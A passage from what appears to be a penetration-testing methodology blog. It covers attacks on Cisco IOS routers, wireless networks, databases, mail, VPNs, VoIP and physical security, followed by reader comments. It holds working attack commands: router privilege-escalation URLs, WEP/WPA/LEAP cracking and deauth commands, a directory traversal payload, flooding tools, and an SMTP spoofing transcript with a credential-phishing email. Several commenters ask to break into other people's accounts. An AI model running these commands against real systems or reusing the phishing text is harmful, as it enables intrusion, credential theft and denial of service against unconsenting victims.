http:///level/99/configure/logging/trap/emergencies/CR
o
To add a rule to allow Telnet:
+
http:///level/99/configure/access-list/100/permit/ip/host//any/CR
*
ios-w3-vuln: – A CLI tool that automatically scrolls through all available privilege levels to identify if any are vulnerable to this attack, this tool is called ios-w3-vuln (although it may have other names.) As well as identifying the vulnerable level, ios-w3-vuln will also attempt to TFTP download the running.config file to a TFTP server running locally.
o
./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
#
Common Vulnerabilities and Exploits (CVE) Information
*
Vulnerabilties and exploit information relating to these products can be found here:
http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
+ full-5
Configuration Files.
#
Configuration Files.
The relevant configuration files that control a Cisco router have already been covered in Methodology | (5) Further your attack. In the child to this entry is a sample running-config file from a Cisco 2600 router running IOS version 12.2.
*
Configuration files explained
o
The line that reads “enable password router”, where “router” is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
o
Telnet Access. If telnet is configured on the VTY (Virtual TTY) interface, then the credentials will be in the config file: line vty 0 4 password telnet login
o
SNMP Settings. If the target router is configured to use SNMP, then the SNMP community strings will be in the config file. It should have the read-only (RO) and may have the read-write (RW) strings: snmp-server community Cisco RO snmp-server community enable RW
o
Password Encryption Utilised
+
Enable password. The Holy Grail, the ‘enable’ password, the root level access to the router. There are two main methods of storing the enable password in a config file, type 5 and type 7, MD5 hashed and Viginere encryption respectively. An example is: enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
#
Type 7 should be avoided as it is extremely easy to crack, it can even be done by hand! An example Type 7 password is given below but does not exist in the example running-config file: enable password 7 104B0718071B17 They can be cracked with the following tools:
*
Boson GetPass User Link
*
Cain User Link
*
Online cracking User Link
#
Type 5 password protection is much more secure. However, should an attacker get hold of the configuration file somehow, then the MD5 hash can be extracted and cracked offline with the following tools:
*
Cain User Link
*
John the Ripper User Link
o
Entered into a text file as follows: username:$1$c2He$GWSkN1va8NJd2icna9TDA.
o
version 12.2
service config
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname vapt-router
!
logging queue-limit 100
enable secret 5 $1$c2He$GWSkN1va8NJd2icna9TDA.
enable password router
!
memory-size iomem 10
ip subnet-zero
no ip routing
!
ip audit notify log
ip audit po max-events 100
!
no voice hpi capture buffer
no voice hpi capture destination
!
mta receive maximum-recipients 0
!
interface Ethernet0/0
ip address 10.1.1.175 255.255.255.0
no ip route-cache
no ip mroute-cache
half-duplex
!
interface Serial0/0
no ip address
no ip route-cache
no ip mroute-cache
shutdown
!
ip http server
no ip http secure-server
ip classless
!
snmp-server community Cisco RO
snmp-server community enable RW
snmp-server enable traps tty
call rsvp-sync
!
mgcp profile default
!
dial-peer cor custom
!
line con 0
line aux 0
line vty 0 4
password telnet
login
!
end
+ full-6
References.
#
Cisco IOS Exploitation Techniques User Link
o
Wireless Penetration
+
Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.
#
Site Map
*
RF Map
o
Lines of Sight
o
Signal Coverage
+
Standard Antenna
+
Directional Antenna
*
Physical Map
o
Triangulate APs
o
Satellite Imagery
#
Network Map
*
MAC Filter
o
Authorised MAC Addresses
o
Reaction to Spoofed MAC Addresses
*
Encryption Keys utilised
o
WEP
+
Key Length
#
Crack Time
#
Key
o
WPA/PSK
+
TKIP
#
Temporal Key Integrity Protocol, (TKIP), is an encryption protocol desgined to replace WEP
*
Key
*
Attack Time
+
AES
#
Advanced Encryption Standard (AES) is an encryption algorithm utilised for securing sensitive data.
*
Key
*
Attack Time
o
802.1x
+
Derivative of 802.1x in use
*
Access Points
o
ESSID
+
Extended Service Set Identifier, (ESSID). Utilised on wireless networks with an access point
#
Broadcast ESSIDs
o
BSSIDs
+
Basic service set identifier, (BSSID), utilised on ad-hoc wireless networks.
#
Vendor
#
Channel
#
Associations
#
Rogue AP Activity
*
Wireless Clients
o
MAC Addresses
+
Vendor
+
Operating System Details
+
Adhoc Mode
+
Associations
o
Intercepted Traffic
+
Encrypted
+
Clear Text
+
Wireless Toolkit
#
Wireless Discovery
*
Aerosol User Link
* penguin
Airfart User Link
* penguin
Aphopper User Link
* penguin
Apradar User Link
*
BAFFLE
* penguin
karma User Link
* penguin
Kismet User Link
*
MiniStumbler User Link
*
Netstumbler User Link
* penguin
Wellenreiter User Link
*
Wifi Hopper User Link
*
WirelessMon User Link
#
Packet Capture
*
Airopeek User Link
* penguin
Airtraf User Link
*
Apsniff User Link
*
Cain User Link
*
Wireshark User Link
#
EAP Attack tools
*
eapmd5pass User Link
o
eapmd5pass -w dictionary_file -r eapmd5-capture.dump
o
eapmd5pass -w dictionary_file -U username -C EAP-MD5 Challengevalue -R EAP_MD5_Response_value -E 2 EAP-MD5 Response EAP ID Value i.e.
-C e4:ef:ff:cf:5a:ea:44:7f:9a:dd:4f:3b:0e:f4:4d:20 -R 1f:fd:6c:46:49:bc:5d:b9:11:24:cd:02:cb:22:6d:37 -E 2
#
Leap Attack Tools
* penguin
asleap User Link
* penguin
thc leap cracker User Link
* penguin
anwrap User Link
#
WEP/ WPA Password Attack Tools
* penguin
Aircrack-ptw User Link
* penguin
Aircrack-ng User Link
* penguin
Aircrack User Link
* penguin
Airsnort User Link
* penguin
cowpatty User Link
* penguin
wep attack User Link
* penguin
wep crack User Link
* penguin
Airbase User Link
*
wzcook User Link
#
Frame Generation Software
*
Airgobbler User Link
*
airpwn User Link
*
Airsnarf User Link
*
Commview User Link
* penguin
fake ap User Link
* penguin
void 11 User Link
* penguin
wifi tap User Link
o
wifitap -b [-o ] [-i [-p] [-w [-k ]] [-d [-v]] [-h]
*
FreeRADIUS – Wireless Pwnage Edition User Link
#
Mapping Software
*
Knsgem User Link
#
File Format Conversion Tools
*
ns1 recovery and conversion tool User Link
*
warbable User Link
*
warkizniz User Link
o
warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]
*
ivstools User Link
#
IDS Tools
*
WIDZ User Link
*
War Scanner User Link
*
Snort-Wireless User Link
*
AirDefense User Link
*
AirMagnet User Link
+
WLAN discovery
#
Unencrypted WLAN
*
Visible SSID
o
Sniff for IP range
+
MAC authorised
+
MAC filtering
#
Spoof valid MAC
* penguin
Linux User Link
o
ifconfig [interface] hw ether [MAC]
* penguin
macchanger User Link
o
Random Mac Address:- macchanger -r eth0
*
mac address changer for windows User Link
*
madmacs User Link
*
TMAC User Link
*
SMAC User Link
*
Hidden SSID
o
Deauth client
+ full-1 penguin
Aireplay-ng User Link
#
aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
+ full-2
Commview User Link
#
Tools > Node reassociation
+ full-3 penguin
Void11 User Link
#
void11_penetration wlan0 -D -t 1 -B [MAC]
#
WEP encrypted WLAN
*
Visible SSID
o
WEPattack User Link
+
wepattack -f [dumpfile] -m [mode] -w [wordlist] -n [network]
#
Capture / Inject packets User Link
*
Break WEP
o full-1 penguin
Aircrack-ptw
+
aircrack-ptw [pcap file]
o full-2 penguin
Aircrack-ng User Link
+
aircrack -q -n [WEP key length] -b [BSSID] [pcap file]
o full-3 penguin
Airsnort User Link
+
Channel > Start
o full-4 penguin
WEPcrack User Link
+
perl WEPCrack.pl
+
./pcap-getIV.pl -b 13 -i wlan0
*
Hidden SSID
o
Deauth client
+ full-1 penguin
Aireplay-ng User Link
#
aireplay -0 1 -a [Access Point MAC] -c [Client MAC] [interface]
+ full-2
Commview User Link
#
Tools > Node reassociation
+ full-3 penguin
Void11 User Link
#
void11_hopper
#
void11_penetration [interface] -D -s [type of attack] -s [station MAC] -S [SSID] -B [BSSID]
Arrow Link
#
WPA / WPA2 encrypted WLAN
*
Deauth client User Link
o
Capture EAPOL handshake
+
WPA / WPA 2 dictionary attack
# full-1 penguin
coWPAtty User Link
*
./cowpatty -r [pcap file] -f [wordlist] -s [SSID]
*
./genpmk -f dictionary_file -d hashfile_name -s ssid
*
./cowpatty -r cature_file.cap -d hashfile_name -s ssid
# full-2 penguin
Aircrack-ng User Link
*
aircrack-ng -a 2 -w [wordlist] [pcap file]
#
LEAP encrypted WLAN
*
Deauth client
o
Break LEAP
+ penguin
asleap User Link
#
./asleap -r data/libpcap_packet_capture_file.dump -f output_pass+hash file.dat -n output_index_filename.idx
#
./genkeys -r dictionary_file -f output_pass+hash file.dat -n output_index_filename.idx
+ penguin
THC-LEAPcracker User Link
#
leap-cracker -f [wordlist] -t [NT challenge response] -c [challenge]
#
802.1x WLAN
*
Create Rogue Access Point
o penguin
Airsnarf User Link
+
Deauth client
#
Associate client
*
Compromise client
o
Acquire passphrase / certificate
+
wzcook
+
Obtain user’s certificate
o penguin
fake ap User Link
+
perl fakeap.pl –interface wlan0
+
perl fakeap.pl –interface wlan0 –channel 11 –essid fake_name –wep 1 –key [WEP KEY]
o penguin
Hotspotter User Link
+
Deauth client
#
Associate client
*
Compromise client
o
Acquire passphrase / certificate
+
wzcook
+
Obtain user’s certificate
o penguin
Karma User Link
+
Deauth client
#
Associate client
*
Compromise client
o
Acquire passphrase / certificate
+
wzcook
+
Obtain user’s certificate
+
./bin/karma etc/karma-lan.xml
o penguin
Linux rogue AP User Link
+
Deauth client
#
Associate client
*
Compromise client
o
Acquire passphrase / certificate
+
wzcook
+
Obtain user’s certificate
#
Resources
*
URL’s
o
Wirelessdefence.org User Link
o
Russix User Link
o
Wardrive.net User Link
o
Wireless Vulnerabilities and Exploits (WVE) User Link
*
White Papers
o
Weaknesses in the Key Scheduling Algorithm of RC4 User Link
o
802.11b Firmware-Level Attacks User Link
o
Wireless Attacks from an Intrusion Detection Perspective User Link
o
Implementing a Secure Wireless Network for a Windows Environment User Link
o
Breaking 104 bit WEP in less than 60 seconds User Link
o
PEAP Shmoocon2008 Wright & Antoniewicz User Link
o
Active behavioral fingerprinting of wireless devices User Link
*
Common Vulnerabilities and Exploits (CVE)
o
Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless
*
Server Specific Tests
o
Databases
+
Direct Access Interrogation
#
MS SQL Server
*
Ports
o
UDP
o
TCP
*
Version
o
SQL Server Resolution Service (SSRS)
o
Other
*
osql
o
Attempt default/common accounts
o
Retrieve data
o
Extract sysxlogins table
#
Oracle
*
Ports
o
UDP
o
TCP
*
TNS Listener
o
VSNUM Converted to hex
o
Ping / version / status / devug / reload / services / save_config / stop
o
Leak attack
*
SQL Plus
*
Default Account/Passwords
*
Default SID’s
#
MySQL
*
Ports
o
UDP
o
TCP
*
Version
*
Users/Passwords
o
mysql.user
#
DB2
#
Informix
#
Sybase
#
Other
+
Scans
#
Default Ports
#
Non-Default Ports
#
Instance Names
#
Versions
+
Password Attacks
#
Sniffed Passwords
*
Cracked Passwords
*
Hashes
#
Direct Access Guesses
+
Vulnerability Assessment
#
Automated
*
Reports
*
Vulnerabilities
o
Severe
o
High
o
Medium
o
Low
#
Manual
*
Patch Levels
o
Missing Patches
*
Confirmed Vulnerabilities
o
Severe
o
High
o
Medium
o
Low
o
Mail
+
Scans
+
Fingerprint
#
Manual
#
Automated
+
Spoofable
#
Telnet spoof
*
telnet target_IP 25
helo target.com
mail from: XXXX@XXX.com
rcpt to: administrator@target.com
data
X-Sender: XXXX@XXX.com
X-Originating-IP: [192.168.1.1]
X-Originating-Email: [XXXX@XXX.com]
MIME-Version: 1.0
To:
From: < XXXX@XXX.com >
Subject: Important! Account check required
Content-Type: text/html
Content-Transfer-Encoding: 7bit
Dear Valued Customer,
The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.
Please go to the following website and log in with your account details.
www.target.com/login
Online Security Manager.
Target Ltd
XXXX@XXX.com
.
+
Relays
o
VPN
+
Scanning
#
500 UDP IPSEC
#
1723 TCP PPTP
#
443 TCP/SSL
#
nmap -sU -P0 -p 500 80.75.68.22-27
#
ipsecscan 80.75.68.22 80.75.68.27
+
Fingerprinting
#
ike-scan –showbackoff 80.75.68.22 80.75.68.27
+
PSK Crack
#
ikeprobe 80.75.68.27
#
sniff for responses with C&A or ikecrack
o
Web
+
Vulnerability Assessment
#
Automated
*
Reports
*
Vulnerabilities
o
Severe
o
High
o
Medium
o
Low
#
Manual
*
Patch Levels
o
Missing Patches
*
Confirmed Vulnerabilities
o
Severe
o
High
o
Medium
o
Low
+
Permissions
#
PUT /test.txt HTTP/1.0
#
CONNECT mail.another.com:25 HTTP/1.0
#
POST http://mail.another.com:25/ HTTP/1.0
Content-Type: text/plain
Content-Length: 6
+
Scans
+
Fingerprinting
#
Other
#
HTTP
*
Commands
o
JUNK / HTTP/1.0
o
HEAD / HTTP/9.3
o
OPTIONS / HTTP/1.0
o
HEAD / HTTP/1.0
o
GET /images HTTP/1.0
o
PROPFIND / HTTP/1.0
*
Modules
o
WebDAV
o
ASP.NET
o
Frontpage
o
OWA
o
IIS ISAPI
o
PHP
o
OpenSSL
*
File Extensions
o
.ASP, .HTM, .PHP, .EXE, .IDQ
#
HTTPS
*
Commands
o
JUNK / HTTP/1.0
o
HEAD / HTTP/9.3
o
OPTIONS / HTTP/1.0
o
HEAD / HTTP/1.0
*
Commands
o
JUNK / HTTP/1.0
o
HEAD / HTTP/9.3
o
OPTIONS / HTTP/1.0
o
HEAD / HTTP/1.0
*
File Extensions
o
.ASP, .HTM, .PHP, .EXE, .IDQ
+
Directory Traversal
#
http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:
*
Penetration – An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.
o
Password Attacks
+
Known Accounts
#
Identified Passwords
#
Unidentified Hashes
+
Default Accounts User Link
#
Identified Passwords
#
Unidentified Hashes
o
Exploits
+
Successful Exploits
#
Accounts
*
Passwords
o
Cracked
o
Uncracked
*
Groups
*
Other Details
#
Services
#
Backdoor
#
Connectivity
+
Unsuccessful Exploits
+
Resources
#
Securiteam User Link
*
Exploits are sorted by year and must be downloaded individually
#
SecurityForest User Link
*
Updated via CVS after initial install
#
GovernmentSecurity User Link
*
Need to create and account to obtain access
#
Red Base Security User Link
*
Oracle Exploit site only
#
Wireless Vulnerabilities & Exploits (WVE) User Link
*
Wireless Exploit Site
#
PacketStorm Security User Link
*
Exploits downloadable by month and year but no indexing carried out.
#
SecWatch User Link
*
Exploits sorted by year and month, download seperately
#
SecurityFocus User Link
*
Exploits must be downloaded individually
#
Metasploit User Link
*
Install and regualrly update via svn
#
Milw0rm User Link
*
Exploit archived indexed and sorted by port download as a whole – The one to go for!
o
Tools
+
Metasploit User Link
#
Free Extra Modules User Link
*
local copy User Link
+
Manual SQL Injection
#
Understanding SQL Injection User Link
#
SQL Injection walkthrough User Link
#
SQL Injection by example User Link
#
Blind SQL Injection User Link
#
Advanced SQL Injection in SQL Server User Link
#
More Advanced SQL Injection User Link
#
Advanced SQL Injection in Oracle databases User Link
#
SQL Cheatsheets
*
http://ha.ckers.org/sqlinjection
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://www.0×000000.com/?i=14
http://pentestmonkey.net/
+
SQL Power Injector User Link
+
SecurityForest User Link
+
SPI Dynamics WebInspect
+
Core Impact User Link
+
Cisco Global Exploiter User Link
+
PIXDos User Link
#
perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]
+
CANVAS User Link
+
Inguma User Link
*
VoIP Security
o
Sniffing Tools
+
AuthTool User Link
+
Cain & Abel User Link
+
Etherpeek User Link
+
NetDude User Link
+
Oreka User Link
+
PSIPDump User Link
+
SIPomatic User Link
+
SIPv6 Analyzer User Link
+
VoiPong User Link
+
VOMIT User Link
+
Wireshark User Link
+
WIST – Web Interface for SIP Trace User Link
o
Scanning and Enumeration Tools
+
enumIAX User Link
+
fping User Link
+
IAX Enumerator User Link
+
iWar User Link
+
Nessus User Link
+
Nmap User Link
+
SIP Forum Test Framework (SFTF) User Link
+
SIPcrack User Link
+
SIP-Scan User Link
+
SIP.Tastic User Link
+
SiVuS User Link
+
SMAP User Link
+
snmpwalk User Link
+
VLANping User Link
+
VoIPAudit User Link
o
Packet Creation and Flooding Tools
+
H.323 Injection Files User Link
+
H225regreject User Link
+
IAXHangup User Link
+
IAXAuthJack User Link
+
IAX.Brute User Link
+
IAXFlooder User Link
#
./iaxflood sourcename destinationname numpackets
+
INVITE Flooder User Link
#
./inviteflood interface target_user target_domain ip_address_target no_of_packets
+
kphone-ddos User Link
+
RTP Flooder User Link
+
rtpbreak User Link
+
Scapy User Link
+
Seagull User Link
+
SIPBomber User Link
+
SIPNess User Link
+
SIPp User Link
+
SIPsak User Link
+
SIP-Send-Fun User Link
+
Spitter User Link
+
TFTP Brute Force User Link
#
perl tftpbrute.pl
+
UDP Flooder User Link
#
./udpflood source_ip target_destination_ip src_port dest_port no_of_packets
+
UDP Flooder (with VLAN Support) User Link
#
./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets
+
Voiphopper User Link
o
Fuzzing Tools
+
Asteroid User Link
+
Codenomicon VoIP Fuzzers User Link
+
Fuzzy Packet User Link
+
Mu Security VoIP Fuzzing Platform User Link
+
ohrwurm RTP Fuzzer User Link
+
PROTOS H.323 Fuzzer User Link
+
PROTOS SIP Fuzzer User Link
+
SIP Forum Test Framework (SFTF) User Link
+
Sip-Proxy User Link
+
Spirent ThreatEx User Link
o
Signaling Manipulation Tools
+
AuthTool User Link
#
./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v
+
BYE Teardown User Link
+
Check Sync Phone Rebooter User Link
+
RedirectPoison User Link
#
./redirectpoison interface target_source_ip target_source_port “”
+
Registration Adder User Link
+
Registration Eraser User Link
+
Registration Hijacker User Link
+
SIP-Kill User Link
+
SIP-Proxy-Kill User Link
+
SIP-RedirectRTP User Link
+
SipRogue User Link
+
vnak User Link
o
Media Manipulation Tools
+
RTP InsertSound User Link
#
./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
+
RTP MixSound User Link
#
./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file
+
RTPProxy User Link
+
RTPInject User Link
o
References
+
URL’s
#
Hacking Exposed VoIP User Link
*
Tool Pre-requisites
o
Hack Library User Link
o
g711conversions User Link
#
VoIPsa User Link
#
Common Vulnerabilities and Exploits (CVE)
*
Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip
+
White Papers
#
An Analysis of Security Threats and Tools in SIP-Based VoIP Systems User Link
#
An Analysis of VoIP Security Threats and Tools User Link
#
Hacking VoIP Exposed User Link
#
Hacking VoIP Wired and Wireless Phones User Link
#
Security testing of SIP implementations User Link
#
SIP Stack Fingerprinting and Stack Difference Attacks User Link
#
Two attacks against VoIP User Link
#
VoIP Attacks! User Link
#
VoIP Security Audit Program (VSAP) User Link
*
Physical Security
o
Building Security
+
Meeting Rooms
#
Check for active network jacks.
#
Check for any information in room.
+
Lobby
#
Check for active network jacks.
#
Does receptionist/guard leave lobby?
#
Accessbile printers? Print test page.
#
Obtain phone/personnel listing.
+
Communal Areas
#
Check for active network jacks.
#
Check for any information in room.
#
Listen for employee conversations.
+
Room Security
#
Resistance of lock to picking.
*
What type of locks are used in
building? Pin tumblers, padlocks,
abinet locks, dimple keys,
proximity sensors?
#
Ceiling access areas.
*
Can you enter the ceiling space (above
a suspended ceiling) and enter secured
rooms?
+
Windows
#
Check windows/doors for visible intruder
alarm sensors.
#
Check visible areas for
sensitive information.
#
Can you video users logging on?
o
Perimeter Security
+
Fence Security
#
Attempt to verify that the whole of the
perimeter fence is unbroken.
+
Exterior Doors
#
If there is no perimeter fence, then determine
if exterior doors are secured, guarded and
monitored etc.
+
Guards
#
Patrol Routines
*
Analyse patrol timings to ascertain if any holes
exist in the coverage.
#
Communications
*
Intercept and analyse guard communications.
Determine if the communication methods can
be used to aid a physial intrusion.
o
Entry Points
+
Guarded Doors
#
Piggybacking
*
Attempt to closely follow employees into the
building without having to show valid credentials.
#
Fake ID
*
Attempt to use fake ID to gain access.
#
Access Methods
*
Test ‘out of hours’ entry methods
+
Unguarded Doors
#
Identify all unguarded
entry points.
*
Are doors secured?
*
Check locks for resistance to lock picking.
+
Windows
#
Check windows/doors for visible intruder
alarm sensors.
*
Attempt to bypass sensors.
#
Check visible areas for
sensitive information.
o
Office Waste
+
Dumpster Diving
Attempt to retrieve any useful information from ToE refuse.
This may include : printed documents, books, manuals,
laptops, PDA’s, USB memory devices, CD’s, Floppy discs etc
Popularity: 37% [?]
Loading ...
Nice info..
readers should also check..
How surfers find their way in times of war to restricted or censored sites
http://www.rediff.com/netguide/2003/apr/03block.htm
regards,
arunim
Your blog is interesting!
Keep up the good work!
Very Nice Site! Thanx!
http://excellent-credit-card.blogspot.com
hey how can i hack some ones mocospace profile ?? …. plzzzzz plzzzz plzzzzz plzzzz reply soon
Hey I need to get my girlfriends yahoo pass.pls help me………….
I also want to hack into mocospace account. Its urgent. Contact at: mocobug@gmail.com
how can i hack yahoo id and password….?
Hi! I was surfing and found your blog post… nice! I love your blog.
Cheers! Sandra. R.
They promise to be faithful in religious duties, treasure their American heritage, to help others and to seek truth and fairness. ,
This committee, in turn, works with a task force whose members have experience in specific issues to plan annual projects. ,
i need ebook on ethical hacking
i wanna know many things like:->
i) How to hack/get yahoo & rediff ID’s password
ii) How to see the videos n photos n scraps in orkut which is locked.
i wanna know many things like:->
i) How to hack/get yahoo & rediff ID’s password
ii) How to see the videos n photos n scraps in orkut which is locked.
i wants a book on ethical hacking
seriously, this blog is awesome . I think im gonna stick around and read a couple of your posts. Take it easy
help me to hack a mocospace account, plizz
pathetic and sad!
what the hell is wrong with u guys!
i would love to know too how to hack a mocospace profile:):? if u can get at me:p
Very often I visit this blog. It very much is pleasant to me. Thanks the author
hey , am wanting to hack mocospace.com profiles to , could you msg me keiren-g-2009@live.co.uk
if you no thanks
Hey, came in from Bing. Bookmarking, see ya.
It is very a pity to me, I can help nothing to you. I think, you will find the correct decision.
I apologise, but, in my opinion, you are not right.
I will know, many thanks for the information.
I am assured, what is it was already discussed.
In it something is and it is good idea. I support you.
could some1 out there teach and guide and help me i have cain and abel and dats all??
My email is Glowsphere121@live.com.au
HIII,
i realy want to know how to do hacking. i wanna larn it. if any body want to teach me then plz contect me at my gmail account.
thanks
plz tell me how to hack vkontakte user name and pw ….. and in orkut too ……..
i just want to say i m here for increasing my knowledge, its my aim to became perfect computer administrator well i m hardware engeneer but i have strong desire to became ethical hacker .its my intresting subject so i just want to increase my knowledge from ur support .